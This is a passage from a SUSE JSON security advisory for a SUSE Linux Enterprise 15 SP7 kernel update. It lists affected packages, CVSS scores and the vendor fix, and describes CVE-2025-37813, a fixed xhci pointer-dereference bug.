"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-37751"
},
{
"cve": "CVE-2025-37813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-37813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: xhci: Fix invalid pointer dereference in Etron workaround\n\nThis check is performed before prepare_transfer() and prepare_ring(), so\nenqueue can already point at the final link TRB of a segment. And indeed\nit will, some 0.4% of times this code is called.\n\nThen enqueue + 1 is an invalid pointer. It will crash the kernel right\naway or load some junk which may look like a link TRB and cause the real\nlink TRB to be replaced with a NOOP. This wouldn\u0027t end well.\n\nUse a functionally equivalent test which doesn\u0027t dereference the pointer\nand always gives correct result.\n\nSomething has crashed my machine twice in recent days while playing with\nan Etron HC, and a control transfer stress test ran for confirmation has\njust crashed it again. The same test passes with this patch applied.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-37813",
"url": "https://www.suse.com/security/cve/CVE-2025-37813"
},
{
"category": "external",
"summary": "SUSE Bug 1242909 for CVE-2025-37813",
"url": "https://bugzilla.suse.com/1242909"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-37813"
},
{
"cve": "CVE-2025-38209",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38209"
}
],
"notes": [
{
"category": "general",
